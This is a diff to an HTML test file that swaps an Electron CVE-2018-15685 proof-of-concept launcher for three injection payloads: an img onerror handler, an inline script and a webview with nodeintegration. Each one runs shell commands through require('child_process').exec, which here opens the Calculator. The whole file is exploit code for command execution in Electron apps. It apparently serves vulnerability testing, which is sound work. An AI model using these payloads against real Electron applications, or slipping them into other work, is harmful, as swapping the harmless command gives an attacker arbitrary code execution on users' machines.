--- a/test_rc.html
+++ b/test_rc.html
@@ -1,21 +1,12 @@
-<!DOCTYPE html>
-<html>
-<head>
-  <title>Electron CVE-2018-15685 RCE PoC</title>
-</head>
-<body>
-  <h1>Exploit Launcher</h1>
-  <button onclick="trigger()">Click to Exploit</button>
+<img src=x onerror="require('child_process').exec('open -a Calculator')">
 
+<script>require('child_process').exec('open -a Calculator')</script>
+
+<webview id="exploit" src="data:text/html,
   <script>
-    function trigger() {
-      const win = window.open('', '', 'nodeIntegration=yes');
-      win.document.write(`
-        <script>
-          require('child_process').exec('open -a Calculator');
-        <\/script>
-      `);
-    }
-  </script>
-</body>
-</html>
+    require('child_process').exec('open -a Calculator')
+  <\/script>"
+  nodeintegration></webview>
+
+
+  
